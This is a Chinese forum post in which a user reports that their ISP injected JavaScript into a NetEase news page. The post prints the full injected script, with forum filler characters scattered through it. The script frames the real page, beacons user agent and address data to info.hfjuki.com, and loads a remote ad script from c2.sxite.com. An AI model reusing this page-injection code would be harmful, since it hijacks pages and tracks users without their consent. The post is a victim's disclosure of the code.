|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑
+ H5 Y* ] c6 j: ~2 ?
. Y8 i9 p: f% Q M8 A1 _; I上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了* J/ b$ S5 \8 ?$ \9 d2 Z
2 M" F8 m: @& o' q( O
接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}, [% Q9 ]% F; I0 _
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
7 Z9 ~0 r) c: p2 l# U: ~. [# G! Q( E: p d
顺便查下ip138:
( T0 A7 P3 i% u6 z: F
& `3 f* k/ l5 v1 w8 W% H这是那段js里面的代码,好象是个半成品还没写入广告数据:
" y, ?7 P' {7 u: y( i. _5 P- function locationSearch() {4 a+ V* h: [( }, l7 {. M# j! H
- var s = getMainJs();2 |9 f5 r0 k3 y# D) V1 `% F' l( S, ]; R
- if (s == null) {
* u0 G6 L! P! f' x* |1 W - location.reload();
/ s3 T. s( X' h* Q. e% C+ `: H1 S - }
3 N3 p1 z3 q) `! L8 I - return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
( g! n* U5 h3 a- b - }
( N( z3 A, ]- K1 H - 1 m9 U/ {' J2 g- W# V' g6 S9 z
- function getParameter(name, paraStr) {
j5 P" a: l( K* P - var result = "";
! z$ g" |& S+ u- n1 p$ G& Z - var str = "&" + paraStr.split("?")[1];0 D5 j4 F% Z6 T% d. Z0 u* N7 F
- var paraName = "&" + name + "=";
* Y; s8 Z/ `5 x) B5 S6 \ - if (str.indexOf(paraName) != -1) {1 C* V7 S% {" j4 _* P
- if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {
0 F3 R3 I) I4 P8 {# m/ l - var TmpStr = str.substring(str.indexOf(paraName), str.length);
# O8 r, N& r! u* U! }* Z8 A - result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(2 N) A( p! N' g# y8 T% M2 y
- 1, TmpStr.length).indexOf("&")1 ?8 _) d& N4 E, w% ^! I5 P
- - TmpStr.indexOf(paraName) + 1);
! o, U2 u/ {3 \) Y2 | - } else {
+ s2 Y6 T& F: |4 @2 B ~ - result = str.substring(str.indexOf(paraName), str.length);
) _* C5 x! U9 j# H - }
; D" k! Z; l3 Q - 7 ^4 [3 w) W6 {
- result = result.substring(result.indexOf("=") + 1, result.length);( a4 J% c$ S4 n/ l' X4 g
- } else {
! E# R9 b3 D0 B; V v8 O. v - result = "No such parameter";/ t$ U8 [6 ?3 ]: u( S
- }" y" G: I$ s: u, S
- return (result.replace("&", ""));
( g& t8 ^* D( b9 ?" c! f - }7 B" G1 N; w6 E; G! b. R; R
- ( p( D" Q U. M E6 n
- function getMainJs() {) [4 v& r$ T1 l2 s
- var scripts = document.getElementsByTagName("script");* d* e% @/ a0 K1 y! |0 l
- var s = null;
# O. \# m1 l% v - for (var i = 0; i < scripts.length; i++) {" q7 q% [3 n- H9 Y8 p. z: p
- if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
6 j! ]0 e D0 R - s = scripts[i];
1 @/ N8 c" L5 Q% k* J - break;
. q" J. ^" U# {2 O. M - }
5 a5 ~, C9 T# m' q; @/ I* R - }! U; }0 ?8 J. T7 H5 z# `( s
- return s;
7 Q' T9 J+ n7 c - }
, U. U% Z. W) l4 R% F: X# h
7 E; C" K+ K' J; J5 G- m; a- function appendParam(oStr, aStr) {
7 w) s4 l9 q1 K' F; v - if (oStr.indexOf('?') > 0) {8 R% ]- R# L! r) A( j$ \4 A
- oStr = oStr + "&" + aStr;4 P/ L* q# v" \# Q( H! O) d- n
- } else {
1 O7 G S8 D7 @2 b; S - oStr = oStr + "?" + aStr;8 }* C, }. S. f6 c) P/ h' {" N
- }
6 p7 z0 Z+ t2 ? - return oStr;! y5 @3 p5 r" I' u* y! B; S
- }
% t( m7 W/ T u
1 b; E0 I4 o3 b- window.onerror = function() {
) |: i4 @3 M0 f3 p - };
7 y4 g# {& A) }4 K) ?* E0 Q - 5 o1 U. p V! ~* r
- var g_titleTime = 0;
9 G: \0 l0 s& ` - function setTcTitle() {; y9 C' i8 n5 u
- if (undefined == document) {
! B$ W) V6 [) v) V6 |6 L' @ - g_titleTime++;
K/ ~2 e7 n' S4 @ - setTimeout("setTcTitle();", 1000);
2 I- u1 l2 r% C! V9 B) e - return;8 a+ B/ B( a/ `% j
- }2 d& Q6 t5 S! x9 i5 s t9 {- v
4 {3 Z+ k0 g3 N& W, V- var doc;3 z+ g: ^+ P0 b
- try {, J4 Y/ A+ N; e" J( s3 R2 s! K1 [
- if (document.all) {
2 M, Y+ y6 E8 _& {# ?1 k5 i* L - doc = document.frames["cn"].document;
& v7 y3 A+ |& n; Z" m4 V, u - } else {
6 v1 t; K& V4 c4 G - doc = document.getElementById("cn").contentDocument;0 Y" }) ?0 V7 M# a0 O& }
- }' ?, }' p7 [5 j7 S6 r4 ]
- } catch (ex) {
$ V/ b6 ]& ]" U" P - }
9 p3 g9 v4 |# V3 ?% q - ( B; } d% I6 B6 ?: b
- if (g_titleTime < 59 Z" [+ {1 J6 {( \2 R5 D
- && (undefined == doc || undefined == doc.title || "" == doc.title)) {2 J$ F5 E/ T& X! W. u1 l# q5 Q
- g_titleTime++;3 ^# l1 j; z) b: v1 w/ |% i/ r Z+ @
- setTimeout("setTcTitle();", 1000);
* w8 I+ f g I6 I& u, o - return;6 O# I* ~3 r+ R" B* s, @2 I+ j/ x2 J
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {- ~8 v2 {3 |- C8 X, o I& b4 T
- document.title = doc.title;4 a5 F. ~( h# Q1 I
- setTcAdvVisible();& P- Z4 R1 c2 R3 C& B x
- }+ c+ Y0 d# @" Y- ^4 ]3 _1 b+ ]
- }6 K& m. X* n- C* d {2 {8 j
- K' c) {% y3 V' a! ^- setTimeout("setTcTitle();", 1000);0 e" n+ \1 B7 Y3 J* w/ N1 C
- ' D' N& C t; A2 s$ n
- var g_isHaveVisible = false;8 k |+ R1 t4 J- l* u
- function setTcAdvVisible() {% b1 V. n/ c, [) }# A% |
- if (undefined != document && undefined != document.getElementById("addiv"), ~1 D! y+ g3 ]$ `3 A1 K$ @) B+ `
- && !g_isHaveVisible) {* n" n. p4 g% n; M5 P; Q' G! @
- document.getElementById("addiv").style.visibility = 'visible';) P4 [! t2 L) t* m
- document.getElementById("addiv").style.display = 'block';
1 ~! Q1 W+ y4 M1 f" X - g_isHaveVisible = true;
8 E( L" w6 ~7 b - }, ?0 v" ~7 F. v( O: |0 J
- }
2 y' l. j* j2 x9 Y - q* H( p0 {6 r c; N7 b
- function UrlAnalyzer() {
3 M$ y6 r: }& V! Y) x% b, F - this.divda = "";
) y% [& W% z* R/ [0 N+ U4 { - this.tctype = "";
d. Q8 {: o) w- }2 B( l4 y - this.radius = "";' u* n' J1 V' ~3 G* { R$ I6 |( g1 Y2 x
- this.rlu = "";
; J1 Z# N, V V0 ^ - }
5 ?: i: L, B) B K1 K! F5 n8 Q1 r( {
! a" w$ J: y/ r R+ G5 d# F- UrlAnalyzer.prototype.initParameters = function() {
( _7 o6 Q1 E: L i6 a - var paraStr = locationSearch();
! s2 T& y1 ~/ d1 |, b9 J, Q - this.rlu = getParameter("lruedct", paraStr);2 z6 k3 s6 G. \/ P) l# `1 k
- this.divda = getParameter("divda", paraStr);& L, u7 x6 r" R3 K U
- this.radius = getParameter("radius", paraStr);; K9 X) Z9 |5 q9 s% ^3 `
- this.tctype = getParameter("tctype", paraStr);% I6 U4 h# Z9 {/ E% Q! l
- this.address = getParameter("address", paraStr);
6 `) ~! M& t* g" A/ V - this.usagent = getParameter("usagent", paraStr);
0 n+ j2 y4 k- |7 J. y8 ^: a7 u - }
" `+ c* o6 b- E: _2 a1 @/ C) I - 3 M+ a b9 z+ J: Q4 `6 J
- UrlAnalyzer.prototype.getHtmlDoc = function() {3 g' b& Y, R: d' N. W }
- var doc;/ u! @& f( u! Z
- try {
; N5 S( l" k- C; ] - if (document.all) {7 {, r) W. U5 q. [ g! T! `, p8 m
- doc = document.frames["cn"].document;
& b! w6 @4 X/ n- m" K - ) E9 ]2 P, r4 i/ l; v7 g
- } else {8 ~# [6 S" h" C# h; a. Y
- doc = document.getElementById("cn").contentDocument;
9 x0 t4 x$ `# n0 q - // doc = document.getElementById("cn").contentWindow.document;
1 C4 c0 p; S! a" Q& ^ - }
% g7 K) c# n0 V! D# A' _ - } catch (ex) {
- t% o; s5 O! K# } - }
4 y! D( b x8 d+ j$ G - return doc;3 o. a8 C: ] f5 S
- }: L5 P) p' n8 E/ E, u0 T
1 O* G" y# B+ x0 ]; k3 Q8 r/ N& v- UrlAnalyzer.prototype.setDomain = function() {
9 B* a* H( u6 v- C$ I2 _. [ - if (undefined != document.title && "" == document.title)% ^/ ]$ c' @2 ~ |3 q, x0 {$ j' y1 a
- {
2 Y; `3 r2 c" g0 v - var index = document.domain.indexOf(".");
1 G9 r5 a% @6 G - if (undefined != index && -1 != index) {
/ ]! i! k+ G/ H - document.domain = document.domain.substring(index + 1,
# A8 I" N6 l1 h" p0 ? - document.domain.length);
; f0 Y4 {. P4 K5 b! [7 ~" l. A4 q - }0 k. d3 f3 t- V- c9 {
- 8 j C5 A8 \" ]* ^; m
- var doc = this.getHtmlDoc();# ?6 @8 X% ?3 b
- if (undefined != doc && undefined != doc.title && "" != doc.title) {
+ | L; V# _! r( u5 ] - document.title = doc.title;
* r# W: Q3 l$ s- a5 n - setTcAdvVisible();" |3 E( B" U, W7 e# O5 N' @) Z* C( r
- }9 h9 l) E" h% U
- }
# B" b( R) U1 z% W! v - }
3 k3 {, P* S( `$ o% U+ F6 |) D# z - ( p% x( f& ]* V3 G6 B) I
- UrlAnalyzer.prototype.iframeCallback = function() {; |! ]7 d& r" i8 }& `3 F5 o( q5 K( E
- var doc = this.getHtmlDoc();+ t1 C& v# a, c4 I9 i" ^4 q7 p
- if (undefined == doc || undefined == doc.title || "" == doc.title) {
4 q0 k; N, f9 `2 v5 t! a - if (undefined != document.domain) {
& t! i/ d$ F8 P6 w
1 t; M/ o; m) L a+ f% `( O- var self = this;
. s; t6 w3 H% i& ?* D - setTimeout(function(){self.setDomain.call(self, null)}, 1000);
9 l" g7 U9 G! S5 B6 E t8 `$ E! ` - // var index = document.domain.indexOf("."); U' x$ x6 w3 u) n4 J8 y# r
- // if (undefined != index && -1 != index) {# u$ d4 L/ U( D+ n9 J+ y
- // document.domain = document.domain.substring(index + 1,
5 r; E# O1 Q1 j' l - // document.domain.length);
! r% `7 N# B. ? - // }/ ~& r1 |! S2 y# Z/ [
- //& B7 q# t9 Y9 K" C
- // var doc = this.getHtmlDoc();
% V/ I9 T* l$ _: b' W( R7 ] - // if (undefined != doc && undefined != doc.title && "" !=7 i' o4 X' p+ i: t- W( D) y8 C
- // doc.title) {) i- }& n0 K5 i/ z2 ~
- // document.title = doc.title;4 k& {2 n2 Z8 H
- // setTcAdvVisible();
% m& f( r! {5 W6 P$ o - // } M/ c2 C, i; }5 ~/ |
- }
$ ~) |" b1 y1 E! w' M0 C) C3 _ - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {1 Z' v! j& j- o, P% s: w/ i: k
- document.title = doc.title;
+ e: E+ o" k1 ^+ p; y/ i1 L - setTcAdvVisible();
+ z; [ @+ A# V/ V' h9 h - }
' e* T2 [1 S- V# _ - }
& k( M! N; b$ B9 U6 ^6 A - ! {( {" T9 X7 B) x
- UrlAnalyzer.prototype.executeHtmlContext = function() {& e. K/ Y/ W, c, t
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda# v8 E7 Y# b+ {; ^/ q- b3 l0 u
- + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;+ W- U0 a H& r1 j# e8 h. T4 W
" F% Q# u8 t4 f1 r4 K! P" ~0 ]- var htmlStr = "<iframe src="" + staUrl$ s e5 [, b& `: ]( D) R0 v
- + "" style="display:none"></iframe>";
/ W7 u" o9 C6 C% ], A7 F - * P" Y v3 _9 ~+ S0 o
- var advUrl = htmlStr$ }5 H% @; Q( C) R4 s
- + "<script src="http://c2.sxite.com:8060/center?advId="' D( [: J+ C) I% G9 U6 w/ k9 }
- + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
1 t! p' f; g+ K7 {- ~7 z1 \ - document.write(advUrl);$ I8 F! k. M1 q* I, }) ?! S9 h* ?5 q
- ( K# K% {8 O8 O0 U
- var self = this;
# `1 G1 i/ H5 a( l. J1 M - var iframe = document.getElementById("cn");$ ]( _: ~' S& Z8 j2 ]* i0 O. }
- if (iframe.attachEvent) {, r4 K- a, _8 e8 q( }; A ]
- iframe.attachEvent("onload", function() {" L1 S% E! e: k% E/ d4 }9 s
- self.iframeCallback.call(self, null);
0 V- D/ v/ l* ?$ y0 N4 v6 @ - });- o6 v9 I% |, w0 s( P0 o% q
- } else {# f A7 A- o2 h" s' L: H
- iframe.onload = function() {
3 N1 Q. O- z/ ?" ?+ _! f3 e - self.iframeCallback.call(self, null);5 P6 R5 r: @6 G8 l ]
- }+ q$ C/ r- o9 z3 S# Q3 S) u
- }
6 C6 t9 q# ~7 ~5 a3 C - }
( M, r& _& g% n1 e B
( f( Y( F: Q" X- UrlAnalyzer.prototype.executeMain = function() {7 y( p1 x& ~- S! v7 _9 z' [
- var mainFrame = document.getElementById("cn");+ x& a+ {- S2 g3 ^* A- o5 ~' ]! x
- mainFrame.contentWindow.location.href = mainFrame.src;6 }% N5 \, }/ ^( }6 J
- this.initParameters();
$ X$ H* n, H; J# c( A2 q - this.executeHtmlContext();
0 P8 ?/ q2 R0 P- T% _0 T - }1 c' d/ X9 ^, f4 g( j" {
% h7 l5 Z: q" ]- var g_analyzer = new UrlAnalyzer();
/ r; Q# k2 O0 m! x2 n9 G2 D - g_analyzer.executeMain();& O( U$ G8 [( I+ @4 C! l7 O
8 V2 Q' ]: u3 x+ z! ~5 T9 y" _
! e, J( B. I4 O. o" B$ a; A# d" f. U8 C [9 P9 T0 M
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
